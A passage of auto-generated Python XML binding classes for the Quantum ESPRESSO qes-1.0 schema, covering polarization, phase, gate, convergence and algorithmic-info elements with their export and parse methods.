self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='polarizationType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='polarizationType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='polarizationType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='polarizationType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.polarization is not None:
self.polarization.export(outfile, level, namespaceprefix_, name_='polarization', pretty_print=pretty_print)
if self.modulus is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:modulus>%s</qes:modulus>%s' % (self.gds_format_double(self.modulus, input_name='modulus'), eol_))
if self.direction is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:direction>%s</qes:direction>%s' % (self.gds_format_double_list(self.direction, input_name='direction'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'polarization':
obj_ = scalarQuantityType.factory()
obj_.build(child_)
self.polarization = obj_
obj_.original_tagname_ = 'polarization'
elif nodeName_ == 'modulus' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'modulus')
self.modulus = fval_
elif nodeName_ == 'direction':
direction_ = child_.text
direction_ = self.gds_validate_double_list(direction_, node, 'direction')
self.direction = direction_
# validate type d3vectorType
self.validate_d3vectorType(self.direction)
# end class polarizationType
class ionicPolarizationType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, ion=None, charge=None, phase=None):
self.original_tagname_ = None
self.ion = ion
self.charge = charge
self.phase = phase
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ionicPolarizationType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ionicPolarizationType.subclass:
return ionicPolarizationType.subclass(*args_, **kwargs_)
else:
return ionicPolarizationType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ion(self): return self.ion
def set_ion(self, ion): self.ion = ion
def get_charge(self): return self.charge
def set_charge(self, charge): self.charge = charge
def get_phase(self): return self.phase
def set_phase(self, phase): self.phase = phase
def hasContent_(self):
if (
self.ion is not None or
self.charge is not None or
self.phase is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='ionicPolarizationType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ionicPolarizationType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ionicPolarizationType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='ionicPolarizationType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='ionicPolarizationType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='ionicPolarizationType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.ion is not None:
self.ion.export(outfile, level, namespaceprefix_, name_='ion', pretty_print=pretty_print)
if self.charge is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:charge>%s</qes:charge>%s' % (self.gds_format_double(self.charge, input_name='charge'), eol_))
if self.phase is not None:
self.phase.export(outfile, level, namespaceprefix_, name_='phase', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ion':
obj_ = atomType.factory()
obj_.build(child_)
self.ion = obj_
obj_.original_tagname_ = 'ion'
elif nodeName_ == 'charge' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'charge')
self.charge = fval_
elif nodeName_ == 'phase':
obj_ = phaseType.factory()
obj_.build(child_)
self.phase = obj_
obj_.original_tagname_ = 'phase'
# end class ionicPolarizationType
class electronicPolarizationType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, firstKeyPoint=None, spin=None, phase=None):
self.original_tagname_ = None
self.firstKeyPoint = firstKeyPoint
self.spin = spin
self.phase = phase
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, electronicPolarizationType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if electronicPolarizationType.subclass:
return electronicPolarizationType.subclass(*args_, **kwargs_)
else:
return electronicPolarizationType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_firstKeyPoint(self): return self.firstKeyPoint
def set_firstKeyPoint(self, firstKeyPoint): self.firstKeyPoint = firstKeyPoint
def get_spin(self): return self.spin
def set_spin(self, spin): self.spin = spin
def get_phase(self): return self.phase
def set_phase(self, phase): self.phase = phase
def hasContent_(self):
if (
self.firstKeyPoint is not None or
self.spin is not None or
self.phase is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='electronicPolarizationType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('electronicPolarizationType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='electronicPolarizationType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='electronicPolarizationType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='electronicPolarizationType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='electronicPolarizationType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.firstKeyPoint is not None:
self.firstKeyPoint.export(outfile, level, namespaceprefix_, name_='firstKeyPoint', pretty_print=pretty_print)
if self.spin is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:spin>%s</qes:spin>%s' % (self.gds_format_integer(self.spin, input_name='spin'), eol_))
if self.phase is not None:
self.phase.export(outfile, level, namespaceprefix_, name_='phase', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'firstKeyPoint':
obj_ = k_pointType.factory()
obj_.build(child_)
self.firstKeyPoint = obj_
obj_.original_tagname_ = 'firstKeyPoint'
elif nodeName_ == 'spin' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'spin')
self.spin = ival_
elif nodeName_ == 'phase':
obj_ = phaseType.factory()
obj_.build(child_)
self.phase = obj_
obj_.original_tagname_ = 'phase'
# end class electronicPolarizationType
class phaseType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, ionic=None, electronic=None, modulus=None, valueOf_=None):
self.original_tagname_ = None
self.ionic = _cast(float, ionic)
self.electronic = _cast(float, electronic)
self.modulus = _cast(None, modulus)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, phaseType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if phaseType.subclass:
return phaseType.subclass(*args_, **kwargs_)
else:
return phaseType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ionic(self): return self.ionic
def set_ionic(self, ionic): self.ionic = ionic
def get_electronic(self): return self.electronic
def set_electronic(self, electronic): self.electronic = electronic
def get_modulus(self): return self.modulus
def set_modulus(self, modulus): self.modulus = modulus
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='phaseType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('phaseType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='phaseType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='phaseType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='phaseType'):
if self.ionic is not None and 'ionic' not in already_processed:
already_processed.add('ionic')
outfile.write(' ionic="%s"' % self.gds_format_double(self.ionic, input_name='ionic'))
if self.electronic is not None and 'electronic' not in already_processed:
already_processed.add('electronic')
outfile.write(' electronic="%s"' % self.gds_format_double(self.electronic, input_name='electronic'))
if self.modulus is not None and 'modulus' not in already_processed:
already_processed.add('modulus')
outfile.write(' modulus=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.modulus), input_name='modulus')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='phaseType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('ionic', node)
if value is not None and 'ionic' not in already_processed:
already_processed.add('ionic')
try:
self.ionic = float(value)
except ValueError as exp:
raise ValueError('Bad float/double attribute (ionic): %s' % exp)
value = find_attr_value_('electronic', node)
if value is not None and 'electronic' not in already_processed:
already_processed.add('electronic')
try:
self.electronic = float(value)
except ValueError as exp:
raise ValueError('Bad float/double attribute (electronic): %s' % exp)
value = find_attr_value_('modulus', node)
if value is not None and 'modulus' not in already_processed:
already_processed.add('modulus')
self.modulus = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class phaseType
class gateInfoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, pot_prefactor=None, gate_zpos=None, gate_gate_term=None, gatefieldEnergy=None):
self.original_tagname_ = None
self.pot_prefactor = pot_prefactor
self.gate_zpos = gate_zpos
self.gate_gate_term = gate_gate_term
self.gatefieldEnergy = gatefieldEnergy
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, gateInfoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if gateInfoType.subclass:
return gateInfoType.subclass(*args_, **kwargs_)
else:
return gateInfoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_pot_prefactor(self): return self.pot_prefactor
def set_pot_prefactor(self, pot_prefactor): self.pot_prefactor = pot_prefactor
def get_gate_zpos(self): return self.gate_zpos
def set_gate_zpos(self, gate_zpos): self.gate_zpos = gate_zpos
def get_gate_gate_term(self): return self.gate_gate_term
def set_gate_gate_term(self, gate_gate_term): self.gate_gate_term = gate_gate_term
def get_gatefieldEnergy(self): return self.gatefieldEnergy
def set_gatefieldEnergy(self, gatefieldEnergy): self.gatefieldEnergy = gatefieldEnergy
def hasContent_(self):
if (
self.pot_prefactor is not None or
self.gate_zpos is not None or
self.gate_gate_term is not None or
self.gatefieldEnergy is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='gateInfoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('gateInfoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='gateInfoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='gateInfoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='gateInfoType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='gateInfoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.pot_prefactor is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:pot_prefactor>%s</qes:pot_prefactor>%s' % (self.gds_format_double(self.pot_prefactor, input_name='pot_prefactor'), eol_))
if self.gate_zpos is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:gate_zpos>%s</qes:gate_zpos>%s' % (self.gds_format_double(self.gate_zpos, input_name='gate_zpos'), eol_))
if self.gate_gate_term is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:gate_gate_term>%s</qes:gate_gate_term>%s' % (self.gds_format_double(self.gate_gate_term, input_name='gate_gate_term'), eol_))
if self.gatefieldEnergy is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:gatefieldEnergy>%s</qes:gatefieldEnergy>%s' % (self.gds_format_double(self.gatefieldEnergy, input_name='gatefieldEnergy'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'pot_prefactor' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'pot_prefactor')
self.pot_prefactor = fval_
elif nodeName_ == 'gate_zpos' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'gate_zpos')
self.gate_zpos = fval_
elif nodeName_ == 'gate_gate_term' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'gate_gate_term')
self.gate_gate_term = fval_
elif nodeName_ == 'gatefieldEnergy' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'gatefieldEnergy')
self.gatefieldEnergy = fval_
# end class gateInfoType
class convergence_infoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, scf_conv=None, opt_conv=None):
self.original_tagname_ = None
self.scf_conv = scf_conv
self.opt_conv = opt_conv
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, convergence_infoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if convergence_infoType.subclass:
return convergence_infoType.subclass(*args_, **kwargs_)
else:
return convergence_infoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_scf_conv(self): return self.scf_conv
def set_scf_conv(self, scf_conv): self.scf_conv = scf_conv
def get_opt_conv(self): return self.opt_conv
def set_opt_conv(self, opt_conv): self.opt_conv = opt_conv
def hasContent_(self):
if (
self.scf_conv is not None or
self.opt_conv is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='convergence_infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('convergence_infoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='convergence_infoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='convergence_infoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='convergence_infoType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='convergence_infoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.scf_conv is not None:
self.scf_conv.export(outfile, level, namespaceprefix_, name_='scf_conv', pretty_print=pretty_print)
if self.opt_conv is not None:
self.opt_conv.export(outfile, level, namespaceprefix_, name_='opt_conv', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'scf_conv':
obj_ = scf_convType.factory()
obj_.build(child_)
self.scf_conv = obj_
obj_.original_tagname_ = 'scf_conv'
elif nodeName_ == 'opt_conv':
obj_ = opt_convType.factory()
obj_.build(child_)
self.opt_conv = obj_
obj_.original_tagname_ = 'opt_conv'
# end class convergence_infoType
class scf_convType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, n_scf_steps=None, scf_error=None):
self.original_tagname_ = None
self.n_scf_steps = n_scf_steps
self.scf_error = scf_error
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, scf_convType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if scf_convType.subclass:
return scf_convType.subclass(*args_, **kwargs_)
else:
return scf_convType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_n_scf_steps(self): return self.n_scf_steps
def set_n_scf_steps(self, n_scf_steps): self.n_scf_steps = n_scf_steps
def get_scf_error(self): return self.scf_error
def set_scf_error(self, scf_error): self.scf_error = scf_error
def hasContent_(self):
if (
self.n_scf_steps is not None or
self.scf_error is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='scf_convType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('scf_convType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='scf_convType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='scf_convType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='scf_convType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='scf_convType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.n_scf_steps is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:n_scf_steps>%s</qes:n_scf_steps>%s' % (self.gds_format_integer(self.n_scf_steps, input_name='n_scf_steps'), eol_))
if self.scf_error is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:scf_error>%s</qes:scf_error>%s' % (self.gds_format_double(self.scf_error, input_name='scf_error'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'n_scf_steps' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'n_scf_steps')
self.n_scf_steps = ival_
elif nodeName_ == 'scf_error' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'scf_error')
self.scf_error = fval_
# end class scf_convType
class opt_convType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, n_opt_steps=None, grad_norm=None):
self.original_tagname_ = None
self.n_opt_steps = n_opt_steps
self.grad_norm = grad_norm
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, opt_convType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if opt_convType.subclass:
return opt_convType.subclass(*args_, **kwargs_)
else:
return opt_convType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_n_opt_steps(self): return self.n_opt_steps
def set_n_opt_steps(self, n_opt_steps): self.n_opt_steps = n_opt_steps
def get_grad_norm(self): return self.grad_norm
def set_grad_norm(self, grad_norm): self.grad_norm = grad_norm
def hasContent_(self):
if (
self.n_opt_steps is not None or
self.grad_norm is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='opt_convType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('opt_convType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='opt_convType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='opt_convType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='opt_convType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='opt_convType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.n_opt_steps is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:n_opt_steps>%s</qes:n_opt_steps>%s' % (self.gds_format_integer(self.n_opt_steps, input_name='n_opt_steps'), eol_))
if self.grad_norm is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:grad_norm>%s</qes:grad_norm>%s' % (self.gds_format_double(self.grad_norm, input_name='grad_norm'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'n_opt_steps' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'n_opt_steps')
self.n_opt_steps = ival_
elif nodeName_ == 'grad_norm' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'grad_norm')
self.grad_norm = fval_
# end class opt_convType
class algorithmic_infoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, real_space_q=None, uspp=None, paw=None):
self.original_tagname_ = None
self.real_space_q = real_space_q
self.uspp = uspp
self.paw = paw
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, algorithmic_infoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if algorithmic_infoType.subclass:
return algorithmic_infoType.subclass(*args_, **kwargs_)
else:
return algorithmic_infoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_real_space_q(self): return self.real_space_q
def set_real_space_q(self, real_space_q): self.real_space_q = real_space_q
def get_uspp(self): return self.uspp
def set_uspp(self, uspp): self.uspp = uspp
def get_paw(self): return self.paw
def set_paw(self, paw): self.paw = paw
def hasContent_(self):
if (
self.real_space_q is not None or
self.uspp is not None or
self.paw is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='algorithmic_infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('algorithmic_infoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='algorithmic_infoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='algorithmic_infoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='algorithmic_infoType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='algorithmic_infoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.real_space_q is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:real_space_q>%s</qes:real_space_q>%s' % (self.gds_format_boolean(self.real_space_q, input_name='real_space_q'), eol_))
if self.uspp is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:uspp>%s</qes:uspp>%s' % (self.gds_format_boolean(self.uspp, input_name='uspp'), eol_))
if self.paw is not None:
showIndent(outfile, level, pretty_print)
